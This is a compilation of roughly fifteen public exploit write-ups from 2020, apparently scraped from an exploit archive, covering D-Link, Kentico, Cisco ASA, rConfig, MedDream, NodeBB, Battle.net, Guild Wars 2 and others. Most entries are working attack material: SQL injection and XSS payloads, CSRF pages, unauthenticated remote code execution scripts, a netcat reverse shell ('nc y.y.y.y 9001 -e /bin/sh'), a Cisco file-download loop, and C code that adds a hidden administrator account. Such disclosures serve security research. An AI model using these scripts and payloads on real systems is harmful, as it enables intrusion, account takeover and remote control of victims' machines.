ISHACK AI BOT

# Exploit Title: D-Link DSR-250N 3.12 - Denial of Service (PoC) # Google Dork: N/A # Author: RedTeam Pentesting GmbH # Date: 2020-10-03 # Exploit Author: Kiko Andreu (kikoas1995) & Daniel Monzón (stark0de) # Vendor Homepage: https://www.dlink.com # Software Link: https://www.dlink.com/en/products/dsr-250n-wireless-n-unified-service-router # Version: 3.17B # CVE : CVE-2020-26567 Advisory: Denial of Service in D-Link DSR-250N RedTeam Pentesting discovered a Denial-of-Service vulnerability in the D-Link DSR-250N device which allows unauthenticated attackers in the same local network to execute a CGI script which reboots the device. Details ======= Product: D-Link DSR-250N Affected Versions: 3.12 and potentially later Fixed Versions: 3.17B Vulnerability Type: DoS Security Risk: low Vendor URL: https://www.dlink.com/en/products/dsr-250n-wireless-n-unified-service-router Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-002 Advisory Status: published CVE: CVE-2020-26567 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26567 Introduction ============ "The D-Link Wireless N Unified Service Router (DSR-250N) provides enhanced security, functionality and performance over a traditional VPN router without the complexity of a full firewall solution. The D-Link Wireless N Unified Service Router is a cost-effective, high performance solution for securing a small business network." (from the vendor's homepage) More Details ============ During a penetration test, the firmware for the D-Link DSR-250N router was downloaded from D-Links official website[1] and extracted for further analysis. It was then confirmed that CGI scripts exist on the router that can be directly accessed with a web browser, without any authentication. In particular, the script "upgradeStatusReboot.cgi" executes the command to reboot the device. Its contents are: ------------------------------------------------------------------------ #!/bin/sh echo Content-type: text/plain echo "" stat=`/sbin/reboot -d 8 &` echo $stat ------------------------------------------------------------------------ Executing this script renders the device unusable for the time of the reboot. In tests, it turned out that the device needs roughly four minutes to complete a reboot. As a consequence, any network using the device as a switch or router is not accessible during that time, too. In the penetration test, the router's web interface was available directly over the Internet. According to the vendor, the web interface is by default disabled for the WAN interface. Proof of Concept ================ An HTTP GET request to the CGI script "upgradeStatusReboot.cgi" will reboot the device: ------------------------------------------------------------------------ $ curl -k -s https://IP-ADDRESS/scgi-bin/upgradeStatusReboot.cgi ------------------------------------------------------------------------ Workaround ========== Access to the D-Link DSR-250N's web interface should only be enabled for administrators, for example by only allowing access from specific IP addresses in the firewall. Access over the WAN interface should also be disabled if it was enabled manually. Fix === A preview firmware version named 3.17B which should correct the issue was received at the end of September from the vendor. RedTeam Pentesting was not able to verify the fix due to lack of access to a test device. However, the formerly accessible CGI script is no longer part of the firmware. Security Risk ============= No authentication is needed to excute the CGI script and thereby reboot the device. Attackers might abuse this behaviour for targeted denial-of-service-attacks against D-Link customers, since rebooting the device interrupts access to networks relying on this device for routing or switching purposes. However, the attack is only possible if the attacker resides on the same network, and no further information can be gathered or control over the devices be obtained. Therefore, the vulnerability is rated as a low risk. Timeline ======== 2020-06-29 Vulnerability identified 2020-07-03 Customer approved disclosure to vendor 2020-07-03 Requested security contact from vendor via web formular 2020-07-03 Vendor replied with contact information 2020-07-07 Advisory provided to vendor 2020-09-28 Vendor provided fixed version to RedTeam Pentesting 2020-10-05 CVE ID requested 2020-10-06 CVE ID assigned 2020-10-08 Advisory released References ========== [1] https://support.dlink.com/ProductInfo.aspx?m=DSR-250N RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit:

# Exploit Title: Kentico CMS 9.0-12.0.49 - Persistent Cross Site Scripting # Exploit Author: Ataberk YAVUZER # CVE: CVE-2019-19493 # Type: Webapps # Vendor Homepage: https://www.kentico.com/ # Version: 9.0-12.0.49 # Date: 29-11-2019 #CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2019-19493 Details Persistent Cross Site Scripting vulnerability has been found on the Admin/User Panel. Kentico before 12.0.50 allows file uploads in which the Content-Type header is inconsistent with the file extension, leading to XSS. # Steps to reproduce 1. Log in to Kentico Admin Panel with your credentials. 2. Browse to Profile Page. 3. Click to "Browse" button on Avatar section. 4. Select "avatar.svg" file which can be found on below. 5. Intercept the request before clicking to save button. 6. Change file name to "avatar.svg.png" and send the request. (MimeType needs to be "image/xml+svg") 7. Kentico will generate an avatar link: " http://example.kentico.com/admin/CMSPages/GetAvatar.aspx?avatarguid=<generated_avatar_uid>" Send that link to another user. 8. An alert with cookie values will pop up. #Content of the avatar.svg: <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"/>

# Exploit Title: DynPG 4.9.1 - Persistent Cross-Site Scripting (Authenticated) # Date: 2020-10-09 # Exploit Author: Enes Özeser # Vendor Homepage: https://dynpg.org/ # Version: 4.9.1 # Tested on: Windows & XAMPP ==> Tutorial <== 1- Login to admin panel. 2- Click on the "Texts" button. 3- Write XSS payload into the Groupname. 4- Press "Create" button. XSS Payload ==> <script>alert("XSS");</script> ==> HTTP Request <== POST /index.php?show=4 HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------342819783638885794661955465553 Content-Length: 725 Origin: http://(HOST) Connection: close Referer: http://(HOST)/index.php?show=4 Cookie: PHPSESSID=bsbas234jfvvdasdasd1i Upgrade-Insecure-Requests: 1 -----------------------------342819783638885794661955465553 Content-Disposition: form-data; name="NEW_GROUP_NAME" <script>alert("XSS");</script> -----------------------------342819783638885794661955465553 Content-Disposition: form-data; name="GROUP_ID" 0 -----------------------------342819783638885794661955465553 Content-Disposition: form-data; name="GRP_SUBMIT" Create -----------------------------342819783638885794661955465553 Content-Disposition: form-data; name="GRP_ACTION" new_grp -----------------------------342819783638885794661955465553 Content-Disposition: form-data; name="dpg_csrf_token" 3F16478C29BED20AA73F1D25CB23F471 -----------------------------342819783638885794661955465553--

# Exploit Title: openMAINT 1.1-2.4.2 - Arbitrary File Upload # Dork: N/A # Date: 2020-08-19 # Exploit Author: mrb3n # Vendor Homepage: https://www.openmaint.org/en # Software Link: https://sourceforge.net/projects/openmaint/files/1.1/openmaint-1.1-2.4.2.zip/download # Version: 1.1-2.4.2 # Category: Webapps # Tested on: Ubuntu 16.04 # CVE: N/A # POC: http://localhost:8080/openmaint/administration.jsp # POST /openmaint/services/json/file/upload?CMDBuild-Authorization=fnlt93ijq0dru5qtenme73d4lf HTTP/1.1 Host: 192.168.1.1:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------12239060382062588071523757460 Content-Length: 1369 Origin: http://192.168.1.1:8080 DNT: 1 Connection: close Referer: http://192.168.1.1:8080/openmaint/administration.jsp Cookie: JSESSIONID=5BAAEBDCC2151BD59ED2CD6FD3CA8165; CMDBuild-Authorization=fnlt93ijq0dru5qtenme73d4lf Upgrade-Insecure-Requests: 1 -----------------------------12239060382062588071523757460 Content-Disposition: form-data; name="fileStore" images -----------------------------12239060382062588071523757460 Content-Disposition: form-data; name="folder" d41d8cd98f00b204e9800998ecf8427e -----------------------------12239060382062588071523757460 Content-Disposition: form-data; name="file"; filename="malicious.jsp" Content-Type: application/octet-stream [Malicious code here] -----------------------------12239060382062588071523757460-- # The malicious file will be uploaded directly to the /upload/images directory with the file name unchanged, example: http://192.168.1.1:8080/openmaint/upload/images/malicious.jsp # How to fix: Update to the latest version # Earlier versions as well as other 1.1-x versions are likely vulnerable.

# Exploit Title: Small CRM 2.0 - 'email' SQL Injection # Google Dork: N/A # Date: 2020-10-10 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/small-crm-php/ # Version: V2.0 # Tested on: Kali Linux # CVE : N/A ========== Vulnerable Code ========== mysqli_query $row1 = mysqli_query($con, "select email,password from user where email='" . $_POST['email'] . "'"); // dbconnection.php ========== Post Request ==================== POST /crm/forgot-password.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: localhost/crm/forgot-password.php Content-Type: application/x-www-form-urlencoded Content-Length: 20 Connection: close Cookie: __test=ec283e73906679549573af64209a5d5b; PHPSESSID=4d272f5938b3ec9c60bb45c4d7b44497 Upgrade-Insecure-Requests: 1 [email protected]&submit= ============= Vulnerable Parameter =============== email (POST) ============= Payload ========================= ' AND (SELECT 1543 FROM (SELECT(SLEEP(5)))gSRd) AND 'PCOX'='PCOX

#!/usr/bin/python # # Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Unauthenticated) # Exploit Author: bzyo # Twitter: @bzyo_ # Date: 10-10-2020 # Vulnerable Software: https://www.softneta.com/products/meddream-pacs-server/ # Vendor Homepage: https://www.softneta.com # Version: 6.8.3.751 # Tested On: Windows 2016 # # # Update to EB 48853 < AUTHENTICATION WAS NOT NEEDED LOLZ # ##PoC## # # 1. create one line php shell to call commands # 2. run script on attacking machine # 3. enter parameters; IP, filename, command # # # root@kali:~# python meddream.py # Enter IP Address: 192.168.0.223 # Enter payload filename + .php: cmd.php # Enter command: whoami # 170759 # <pre>nt authority\system # </pre> # http://192.168.0.223/Pacs/upload/20201010-170759--cmd.php?cmd=whoami # 404 # 404 # 404 # 404 # 404 # 404 # 404 # 404 # 404 # # from urllib2 import urlopen import requests import sys import time from datetime import datetime, timedelta ip_addr = raw_input("Enter IP Address: ") user_file = raw_input("Enter payload filename + .php: ") cmd = raw_input("Enter command: ") URL= 'http://' + ip_addr + '/Pacs/uploadImage.php' def main(): session = requests.Session() files = [ ('actionvalue', (None, 'Attach', None)), ('uploadfile', (user_file, open(user_file, 'rb'), 'application/x-php')), ('action', (None, 'Attach', None)), ] site = session.post(URL, files=files) today = datetime.today() upload_date = today.strftime("%Y%m%d") less = 1 now1 = datetime.now() up_time1 = now1.strftime("%H%M%S") print(up_time1) #varying time checks +/- now2 = now1 - timedelta(seconds=less) up_time2 = now2.strftime("%H%M%S") now3 = now2 - timedelta(seconds=less) up_time3 = now3.strftime("%H%M%S") now4 = now3 - timedelta(seconds=less) up_time4 = now4.strftime("%H%M%S") now5 = now4 - timedelta(seconds=less) up_time5 = now5.strftime("%H%M%S") now6 = now5 - timedelta(seconds=less) up_time6 = now6.strftime("%H%M%S") now7 = now6 - timedelta(seconds=less) up_time7 = now7.strftime("%H%M%S") now8 = now1 + timedelta(seconds=less) up_time8 = now8.strftime("%H%M%S") now9 = now8 + timedelta(seconds=less) up_time9 = now8.strftime("%H%M%S") now10 = now1 + timedelta(seconds=less) up_time10 = now9.strftime("%H%M%S") up_time_array = [up_time1, up_time2, up_time3, up_time4, up_time5, up_time6, up_time7, up_time8, up_time9, up_time10] for i in up_time_array: r = session.get('http://' + ip_addr + '/Pacs/upload/'+ upload_date + "-" + i + "--" + user_file + "?cmd=" + cmd) if r.status_code == 200: print r.content print r.url else: print ("404") if __name__ == '__main__': main()

# Title: Online Students Management System 1.0 - 'username' SQL Injections # Exploit Author: George Tsimpidas # Date: 2020-10-09 # Vendor Homepage: www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/studentrecord_0.zip # Version : 1.0 # Tested on: Ubuntu 18.04.5 LTS (Bionic Beaver) # Category: Webapp # Description The files index.php on the main login page, and the index.php on the /admin/ login page does not perform input validation on the regno and username parameters. An attacker can send malicious input in the post request to http://localhost/index.php or either http://localhost/admin/index.php and bypass authentication, extract sensitive information etc. #POC 1) Navigate to the admin login page Example: http://localhost/admin/index.php 2) Fill in dummy values for 'username' and 'password' fields and send the request via an HTTP intercept tool 3) Save the request to file. Example, student_record_sqli.req POST /admin/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 32 Origin: http://localhost DNT: 1 Connection: close username=admin&password=dummy 4) Run SQLmap on the file, sqlmap -r student_record_sqli.req --dbms=mysql --threads=10 -p username

# Exploit Title: Liman 0.7 - Cross-Site Request Forgery (Change Password) # Date: 2020-10-07 # Exploit Author: George Tsimpidas # Software Link : https://github.com/salihciftci/liman/releases/tag/v0.7 # Version: 0.7 # Tested on: Ubuntu 18.04.5 LTS (Bionic Beaver) # Category: Webapp Description: There is no CSRF protection in Liman application, with a little help of social engineering (like sending a link via email/chat) an attacker may force the victim to click on a malicious link, with the purpose of manipulating his current account information, or changing entirely his password. Vulnerable Endpoints : http://127.0.0.1:5000/settings/profile http://127.0.0.1:5000/settings/password Proof of Concept Download the application, make an account and login inside the panel under : http://127.0.0.1:5000 expose the docker port on 5000. Save this .html files and send it to victim (Victim should be logged in in the browser) Crafted value will be added. Account Information CSRF : <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1:5000/settings/profile" method="POST"> <input type="hidden" name="username" value="betatest" /> <input type="hidden" name="email" value="[email protected]" /> <input type="submit" value="TakeOver Account Settings" /> </body> </html> Password Change CSRF : <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1:5000/settings/password" method="POST"> <input type="hidden" name="password" value="takeover" /> <input type="hidden" name="newPassword" value="takeover" /> <input type="hidden" name="confirmPassword" value="takeover" /> <input type="submit" value="Password TakeOver" /> </body> </html>

# Exploit Title: Cisco ASA and FTD 9.6.4.42 - Path Traversal # Date: 2020-10-10 # Exploit Author: 3ndG4me # Vendor: www.cisco.com # Product: https://www.cisco.com/c/en/us/products/security/asa-firepower-services/index.html # CVE : CVE-2020-3452 TARGET=$1 CISCO_KNOWN_FILES="logo.gif http_auth.html user_dialog.html localization_inc.lua portal_inc.lua include nostcaccess.html ask.html no_svc.html svc.html session.js useralert.html ping.html help app_index.html tlbr portal_forms.js logon_forms.js win.js portal.css portal.js sess_update.html blank.html noportal.html portal_ce.html portal.html home logon_custom.css portal_custom.css preview.html session_expired custom portal_elements.html commonspawn.js common.js appstart.js appstatus relaymonjar.html relaymonocx.html relayjar.html relayocx.html portal_img color_picker.js color_picker.html cedhelp.html cedmain.html cedlogon.html cedportal.html cedsave.html cedf.html ced.html lced.html files 041235123432C2 041235123432U2 pluginlib.js shshim do_url clear_cache connection_failed_form apcf ucte_forbidden_data ucte_forbidden_url cookie session_password.html tunnel_linux.jnlp tunnel_mac.jnlp sdesktop gp-gip.html auth.html wrong_url.html logon_redirect.html logout.html logon.html test_chargen" mkdir cisco_asa_files if [ -z "$1" ]; then echo "Usage: cve-2020-3452.sh <target ip/hostname>" echo "Example: cve-2020-3452.sh mytarget.com" echo "Files that are downloaded will be in the newly created 'cisco_asa_files' directory" echo "Target not specificed...exiting..." else for FILE in $CISCO_KNOWN_FILES; do curl "https://$TARGET/+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/${FILE}&default-language&lang=../" | tee cisco_asa_files/$FILE; done fi

# Exploit Title: berliCRM 1.0.24 - 'src_record' SQL Injection # Google Dork: N/A # Date: 2020-10-11 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://www.berlicrm.de # Software Link: https://github.com/berliCRM/berlicrm/archive/1.0.24.zip # Version: 1.0.24 # Tested on: Kali Linux # CVE : N/A ========== Post Request ========================= POST /index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: localhost Cookie: PHPSESSID=bab89b6fc39e1fd2c26877a4544cbb64 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Content-Length: 226 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 Connection: Keep-alive __vtrftk=sid:ff114f440469f69f1507ebd04c65e05ba2fcc8d3%2C1602392658&module=Contacts&src_field=contact_id&src_module=Contacts&src_record=1&triggerEventName=postSelection721&view=Popup ============= Vulnerable Parameter =============== src_record (POST) ============= Payload =========================== 0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z

# Exploit Title: Battle.Net 1.27.1.12428 - Insecure File Permissions # Date: 2020-10-09 # Exploit Author: George Tsimpidas # Software Link : https://www.blizzard.com/en-gb/download/ ( Battle Net Desktop ) # Version Patch: 1.27.1.12428 # Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362 # Category: local Vulnerability Description: Battle.Net Launcher (Battle.net.exe) suffers from an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the 'F' flag (Full) for 'Users' group, making the entire directory 'Battle.net' and its files and sub-dirs world-writable. ## Insecure Folder Permission C:\Program Files (x86)>icacls Battle.net Battle.net BUILTIN\Users:(OI)(CI)(F) BUILTIN\Administrators:(OI)(CI)(F) CREATOR OWNER:(OI)(CI)(F) ## Insecure File Permission C:\Program Files (x86)\Battle.net>icacls "Battle.net.exe" Battle.net.exe BUILTIN\Users:(I)(F) BUILTIN\Administrators:(I)(F) FREY-OMEN\30698:(I)(F) ## Local Privilege Escalation Proof of Concept #0. Download & install #1. Create low privileged user & change to the user ## As admin C:\>net user lowpriv Password123! /add C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full" User name lowpriv Local Group Memberships *Users Global Group memberships *None #2. Move the Service EXE to a new name C:\Program Files (x86)\Battle.net> whoami lowpriv C:\Program Files (x86)\Battle.net> move Battle.net.exe Battle.frey.exe 1 file(s) moved. #3. Create malicious binary on kali linux ## Add Admin User C Code kali# cat addAdmin.c int main(void){ system("net user placebo mypassword /add"); system("net localgroup Administrators placebo /add"); WinExec("C:\\Program Files (x86)\\Battle.net\\Battle.frey.exe>",0); return 0; } ## Compile Code kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o Battle.net.exe #4. Transfer created 'Battle.net.exe' to the Windows Host #5. Move the created 'Battle.net.exe' binary to the 'C:\Program Files (x86)\Battle.net>' Folder C:\Program Files (x86)\Battle.net> move C:\Users\lowpriv\Downloads\Battle.net.exe . #6. Check that exploit admin user doesn't exists C:\Program Files (x86)\Battle.net> net user placebo The user name could not be found #6. Reboot the Computer C:\Program Files (x86)\Battle.net> shutdown /r #7. Login & look at that new Admin C:\Users\lowpriv>net user placebo | findstr /i "Membership Name" | findstr /v "Full" User name placebo Local Group Memberships *Administrators *Users Global Group memberships *None

#!/usr/bin/python3 # Exploit Title: TimeClock Software 1.01 Authenticated Time-Based SQL Injection # Date: July 21, 2020 # Exploit Author: François Bibeau # Co Author: Tyler Butler, http://tbutler.org, https://twitter.com/tbutler0x90 # Vendor Homepage: http://timeclock-software.net/ # Software Link: http://timeclock-software.net/timeclock-download.php # Version: 1.01 # Tested on: Ubuntu 18.04.3 (LTS) x64, mysql 5.7, php 7.2.1-apache import time import requests login_url = 'http://159.203.41.34/login_action.php' # Ensure to change ip to match target login_data = {'username':'fred','password':'fred','submit':'Log In'} headers = {'User-Agent': 'Mozilla/5.0'} # init session & login session = requests.Session() session.post(login_url,headers=headers,data=login_data) # static list provided for PoC, could use a text file users = ['john','bill','tim','fred','garry','sid','admin'] for user in users: url = "http://159.203.41.34/add_entry.php" payload = f"' OR IF((SELECT username FROM user_info WHERE username='{user}')='{user}', SLEEP(5), NULL)='" data = {'data_month': '1', 'data_day': '1', 'data_year': '1', 'type_id': '5', 'hours': '1', 'notes': payload, 'submit': 'Add'} print(f'Checking user {user}... ', end = '') start = time.time() response = session.post(url,data=data) end = time.time() delay = end - start if delay > 5: print('User found!') else: print('')

# Exploit Title: NodeBB Forum 1.12.2-1.14.2 - Account Takeover # Date: 2020-08-18 # Exploit Author: Muhammed Eren Uygun # Vendor Homepage: https://nodebb.org/ # Software Link: https://github.com/NodeBB/NodeBB # Version: 1.12.2-1.14.2 # Tested on: Linux # CVE : CVE-2020-15149 - https://github.com/NodeBB/NodeBB/security/advisories/GHSA-hr66-c8pg-5mg7 Impact: ---------------------- A bug in this validation logic made it possible to change the password of any user on a running NodeBB forum by sending a specially crafted socket.io call to the server. This could lead to a privilege escalation event due via an account takeover. Bug PoC: ---------------------- Blog: https://medium.com/bugbountywriteup/privilege-escalation-via-account-takeover-on-nodebb-forum-software-512-a593a7b1b4a4 1- Create a user 2- Go to password change page 3- Change password with proxy 427["user.changePassword",("currentPassword":"Test.12345!","newPassword":"Admin123!","uid":5)]) 4- Replace the uid on the request with 1, which is the uid value of the admin user, and send the request. 5- So you can login with this password to admin user.

# Exploit Title: rConfig 3.9.5 - Remote Code Execution (Unauthenticated) # Google Dork: N/A # Date: 2020-10-13 # Exploit Author: Daniel Monzón (stark0de) # Vendor Homepage: https://www.rconfig.com/ # Software Link: https://www.rconfig.com/downloads/rconfig-3.9.5.zip # Version: rConfig v3.9.5 # Tested on: CentOS 7 x64 # CVE : N/A import requests from requests_toolbelt.multipart.encoder import MultipartEncoder import urllib3 import re #from bs4 import BeautifulSoup urllib3.disable_warnings() url="https://x.x.x.x/" #change this to fit your URL (adding the last slash) payload="nc y.y.y.y 9001 -e /bin/sh" #change this to whatever payload you want payload_rce= "fileName=../www/test.php&code=<%3fphp+echo+system('ls')%3b%3f>&id=3" #if you want to use Method 2 for RCE, use a PHP, urlencoded payload as the value of the code parameter print("Connecting to: {}".format(url)) print("Connect back is set to: {}, please launch 'nc -lv 9001'".format(payload)) x = requests.get(url+"login.php", verify=False) version = re.search("<p>(.*)<span>", x.text) version = version.group(1) if version == "rConfig Version 3.9.5": print("Version 3.9.5 confirmed") else: print("Version is "+version+ " it may not be vulnerable") payload_final=";"+payload referer=url+"useradmin.php" origin=url proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"} #in case you need to debug the exploit with Burp, add ', proxies=proxies' to any request def createuser(): multipart_data = MultipartEncoder( fields={ 'username': 'test', 'password': 'Testing1@', #password should have a capital letter, lowercase, number and a symbol 'passconf': 'Testing1@', 'email': '[email protected]', 'ulevelid': '9', 'add': 'add', 'editid': '' } ) headers = {'Content-Type': multipart_data.content_type, "Upgrade-Insecure-Requests": "1", "Referer": referer, "Origin":origin} cookies = {'PHPSESSID': 'test'} response = requests.post(url+'lib/crud/userprocess.php', data=multipart_data, verify=False, cookies=cookies, headers=headers, allow_redirects=False) if "error" not in response.text: print("(+) User test created") else: print("(-) User couldn't be created, please debug the exploit") def exploit(): payload = { 'user': 'test', 'pass': 'Testing1@', 'sublogin': '1' } with requests.Session() as s: p = s.post(url+'lib/crud/userprocess.php', data=payload, verify=False) if "Stephen Stack" in p.text: print("(-) Exploit failed, could not login as user test") else: print("(+) Log in as test completed") params = {'path':'test', 'ext': payload_final } rce=s.get(url+'lib/ajaxHandlers/ajaxArchiveFiles.php', verify=False, params=params) if "success" in rce.text: print("(+) Payload executed successfully") else: print("(-) Error when executing payload, please debug the exploit") #if you used method 2 to auth bypass and 1 for RCE, ignore this message payload = { 'user': 'admin', 'pass': 'Testing1@', 'sublogin': '1' } with requests.Session() as s: p = s.post(url+'lib/crud/userprocess.php', data=payload, verify=False) if "Stephen Stack" in p.text: print("(-) Exploit failed, could not login as user test") else: print("(+) Log in as test completed") params = {'path':'test', 'ext': payload_final } rce=s.get(url+'lib/ajaxHandlers/ajaxArchiveFiles.php', verify=False, params=params) if "success" in rce.text: print("(+) Payload executed successfully") else: print("(-) Error when executing payload, please debug the exploit") def user_enum_update(): users=requests.get(url+'useradmin.inc.php', verify=False) #matchObj = re.findall(r'<td align="center">(.*?)</td>', users.text, re.M|re.I|re.S) if "admin" in users.text: print("(+) The admin user is present in this rConfig instance") multipart_data = MultipartEncoder( fields={ 'username': 'admin', 'password': 'Testing1@', #password should have a capital letter, lowercase, number and a symbol 'passconf': 'Testing1@', 'email': '[email protected]', 'ulevelid': '9', 'add': 'add', 'editid': '1' #you may need to increment this if you want to reset the password of a different user } ) headers = {'Content-Type': multipart_data.content_type, "Upgrade-Insecure-Requests": "1", "Referer": referer, "Origin":origin} cookies = {'PHPSESSID': 'test'} response = requests.post(url+'lib/crud/userprocess.php', data=multipart_data, verify=False, cookies=cookies, headers=headers, allow_redirects=False) if "error" not in response.text: print("(+) The new password for the admin user is Testing1@") else: print("(-) Admin user couldn't be edited, please debug the exploit") elif "Admin" in users.text: print("(+) There is at least one Admin user, check "+ str(url)+"useradmin.inc.php manually and modify the exploit accordingly (erase the if-elif statements of this function and modify the user payload)") def template(): payload = { 'user': 'admin', 'pass': 'Testing1@', 'sublogin': '1' } #<%3fphp+%24sock%3Dfsockopen%28%22192.168.1.13%22%2C1234%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%3f> headers_rce = {'Content-Type': "application/x-www-form-urlencoded; charset=UTF-8", "Referer": url+"deviceConnTemplates.php", "Origin":origin, "X-Requested-With": "XMLHttpRequest", "Accept-Language": "en-US,en;q=0.5"} with requests.Session() as s: p = s.post(url+'lib/crud/userprocess.php', data=payload, verify=False) if "Stephen Stack" in p.text: print("(-) Exploit failed, could not login as user test") else: print("(+) Log in as admin completed") rce=s.post(url+'lib/ajaxHandlers/ajaxEditTemplate.php', verify=False, data=payload_rce, headers=headers_rce) if "success" in rce.text: print("(+) File created") rce_req = s.get(url+'test.php.yml', verify=False) print("(+) Command results: ") print(rce_req.text) else: print("(-) Error when executing payload, please debug the exploit") def main(): print("Remote Code Execution + Auth bypass rConfig 3.9.5 by Daniel Monzón") print("In the last stage if your payload is a reverse shell, the exploit may not launch the success message, but check your netcat ;)") print("Note: preferred method for auth bypass is 1, because it is less 'invasive'") print("Note2: preferred method for RCE is 2, as it does not need you to know if, for example, netcat has been installed in the target machine") print('''Choose method for authentication bypass: 1) User creation 2) User enumeration + User edit ''') auth_bypass=str(input("Method>")) if auth_bypass == "1": createuser() elif auth_bypass == "2": user_enum_update() print('''Choose method for RCE: 1) Unsafe call to exec() 2) Template edit ''') rce_method=str(input("Method>")) if rce_method == "1": exploit() elif rce_method == "2": template() main()

# Exploit Title: Guild Wars 2 - Insecure Folder Permissions # Date: 2020-10-09 # Exploit Author: George Tsimpidas # Software Link : https://account.arena.net/welcome # Version Build : 106915 # Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362 # Category: local Vulnerability Description: Guild Wars 2 Launcher (Gw2-64.exe) suffers from an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the 'F' flag (Full) for 'Everyone' group, making the entire directory 'Guild Wars 2' and its files and sub-dirs world-writable. # Local Privilege Escalation Proof of Concept D:\icacls "Guild Wars 2" Guild Wars 2 Everyone:(F) Everyone:(OI)(CI)(IO)(M,WDAC,WO,DC) BUILTIN\Administrators:(I)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) NT AUTHORITY\Authenticated Users:(I)(M) NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M) BUILTIN\Users:(I)(RX) BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) ## Insecure File Permission D:\Guild Wars 2icacls Gw2-64.exe Gw2-64.exe Everyone:(F) Everyone:(I)(F) BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\Authenticated Users:(I)(M) BUILTIN\Users:(I)(RX) #0. Download & install #1. Create low privileged user & change to the user ## As admin C:\net user lowpriv Password123! /add C:\net user lowpriv | findstr /i "Membership Name" | findstr /v "Full" User name lowpriv Local Group Memberships *Users Global Group memberships *None #2. Move the Service EXE to a new name D:\Guild Wars 2whoami lowpriv D:\Guild Wars 2move Gw2-64.exe Gw2-64.frey.exe 1 file(s) moved. #3. Create malicious binary on kali linux ## Add Admin User C Code kali# cat addAdmin.c int main(void){ system("net user placebo mypassword /add"); system("net localgroup Administrators placebo /add"); WinExec("D:\\Guild Wars 2\\Gw2-64.frey.exe",0); return 0; } ## Compile Code kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o Gw2-64.exe #4. Transfer created 'Gw2-64' to the Windows Host #5. Move the created 'Gw2-64' binary to the 'D:\Guild Wars 2' Folder D:\Guild Wars 2move C:\Users\lowpriv\Downloads\Gw2-64.exe . #6. Check that exploit admin user doesn't exists D:\Guild Wars 2net user placebo The user name could not be found #6. Reboot the Computer D:\Guild Wars 2shutdown /r #7. Login & now start the Guild Wars 2 Game, back doored launcher will be executed, and the user placebo will be created, and added to the Administrators group. C:\Users\lowprivnet user placebo | findstr /i "Membership Name" | findstr /v "Full" User name placebo Local Group Memberships *Administrators *Users Global Group memberships *None

